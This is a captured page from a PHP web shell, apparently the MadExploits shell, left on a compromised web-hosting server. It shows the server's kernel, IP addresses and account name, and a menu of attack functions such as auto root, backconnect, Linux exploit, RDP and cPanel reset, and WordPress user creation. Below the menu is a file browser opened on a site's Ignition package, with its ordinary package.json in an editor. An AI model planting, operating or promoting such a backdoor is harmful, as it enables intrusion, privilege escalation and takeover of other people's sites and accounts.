Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
vendor /
spatie /
ignition /
[ HOME SHELL ]
Name
Size
Permission
Action
resources
[ DIR ]
dr-xr-xr-x
src
[ DIR ]
dr-xr-xr-x
CHANGELOG.md
156
B
-rw-r--r--
LICENSE.md
1.06
KB
-rw-r--r--
README.md
11.93
KB
-rw-r--r--
composer.json
1.89
KB
-rw-r--r--
lint-staged.config.js
91
B
-rw-r--r--
package.json
2.24
KB
-rw-r--r--
phpstan-baseline.neon
0
B
-rw-r--r--
phpstan.neon.dist
156
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "@flareapp/ignition", "version": "0.0.1", "scripts": { "bundle": "microbundle -i resources/js/index.tsx -o resources/compiled/ignition.js --generateTypes false --jsx React.createElement --jsxFragment React.Fragment -f cjs --no-sourcemap --external none --define process.env.NODE_ENV='production'", "dev": "NODE_ENV=development ROLLUP_WATCH=true concurrently -n \"dev,typescript\" -c \",green\" \"microbundle watch -i resources/js/index.tsx -o resources/compiled/ignition.js --generateTypes false --jsx React.createElement --jsxFragment React.Fragment -f cjs --no-sourcemap --external none --define process.env.NODE_ENV='development' --no-compress \" \"yarn typecheck\"", "format": "prettier --write 'resources/**/*.{css,js,ts,tsx}'", "typecheck": "tsc -w --preserveWatchOutput", "postinstall": "sed -i '' '/For example <script/d' ./node_modules/@fortawesome/fontawesome-svg-core/index.es.js; sed -i '' '/For example <script/d' ../node_modules/@fortawesome/fontawesome-svg-core/index.es.js; exit 0" }, "dependencies": { "@flareapp/ignition-ui": "^3.0.0", "@fortawesome/fontawesome-svg-core": "^1.2.36", "@fortawesome/free-brands-svg-icons": "^5.15.4", "@fortawesome/free-solid-svg-icons": "^5.15.4", "@fortawesome/react-fontawesome": "^0.1.16", "@tailwindcss/line-clamp": "^0.3.0", "lodash": "^4.17.21", "microbundle": "^0.14.2", "react": "^17.0.2", "react-dom": "^17.0.2", "react-intersection-observer": "^8.32.5", "tailwindcss": "^3.0.15" }, "devDependencies": { "@flareapp/flare-client": "^1.0.12", "@types/lodash": "^4.14.169", "@types/react-dom": "^17.0.5", "autoprefixer": "^10.4.0", "concurrently": "^6.2.0", "husky": "^1.3.1", "lint-staged": "^11.0.0", "postcss": "^8.4.5", "postcss-easy-import": "^3.0.0", "postcss-import": "^14.0.2", "postcss-preset-env": "^6.7.0", "prettier": "^2.5.0", "typescript": "^4.2.4" }, "husky": { "hooks": { "pre-commit": "lint-staged && yarn bundle && git add resources/compiled/ignition.js && git add resources/compiled/ignition.css" } } }
Close